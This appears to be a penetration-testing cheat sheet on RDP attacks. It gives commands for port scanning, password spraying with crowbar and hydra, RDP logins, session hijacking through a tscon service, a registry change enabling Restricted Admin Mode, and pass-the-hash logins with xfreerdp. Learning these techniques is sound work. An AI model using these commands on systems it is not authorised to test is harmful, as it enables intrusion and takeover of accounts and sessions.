5.rdp
I. RDP Basics
Function: Provides a graphical interface for remote computer access.
Port: TCP/3389.
Use Cases: System administration, MSPs.
Attack Vectors:
Misconfigurations (weak/no passwords).
Password guessing/spraying.
Session hijacking.
Pass-the-Hash (PtH).
Exploiting vulnerabilities (e.g., BlueKeep).
II. Enumeration
Nmap:
nmap -Pn -p3389 <target_IP>III. Misconfigurations & Password Attacks
Password Spraying:
crowbar -b rdp -s <target_IP>/32 -U <user_list> -c <password>
hydra -L <user_list> -p <password> <target_IP> rdpRDP Login:
rdesktop -u <user> -p <password> <target_IP>
xfreerdp /v:<target_IP> /u:<user> /p:<password>IV. Protocol-Specific Attacks
RDP Session Hijacking:
query user
sc.exe create sessionhijack binpath= "cmd.exe /k tscon <target_session_ID> /dest:rdp-tcp#<our_session_ID>"
net start sessionhijackRDP Pass-the-Hash (PtH):
Enable Restricted Admin Mode (registry key):
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /fAuthenticate using NT Hash:
xfreerdp /v:<target_IP> /u:<user> /pth:<NT_hash>V. Latest RDP Vulnerabilities
CVE-2019-0708 (BlueKeep):
RCE vulnerability.
Use-After-Free (UAF) technique.
Triggered by manipulated initialization requests.
Impacts older Windows versions.
Exploitation can cause system instability (BSoD).
Key Commands Summary
Nmap:
nmap -Pn -p3389 <target_IP>Crowbar:
crowbar -b rdp -s <target_IP>/32 -U <user_list> -c <password>Hydra:
hydra -L <user_list> -p <password> <target_IP> rdprdesktop:
rdesktop -u <user> -p <password> <target_IP>xfreerdp:
xfreerdp /v:<target_IP> /u:<user> /p:<password>
xfreerdp /v:<target_IP> /u:<user> /pth:<NT_hash>Windows Commands:
query user
sc.exe create sessionhijack binpath= "cmd.exe /k tscon <target_session_ID> /dest:rdp-tcp#<our_session_ID>"
net start sessionhijack
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /fLast updated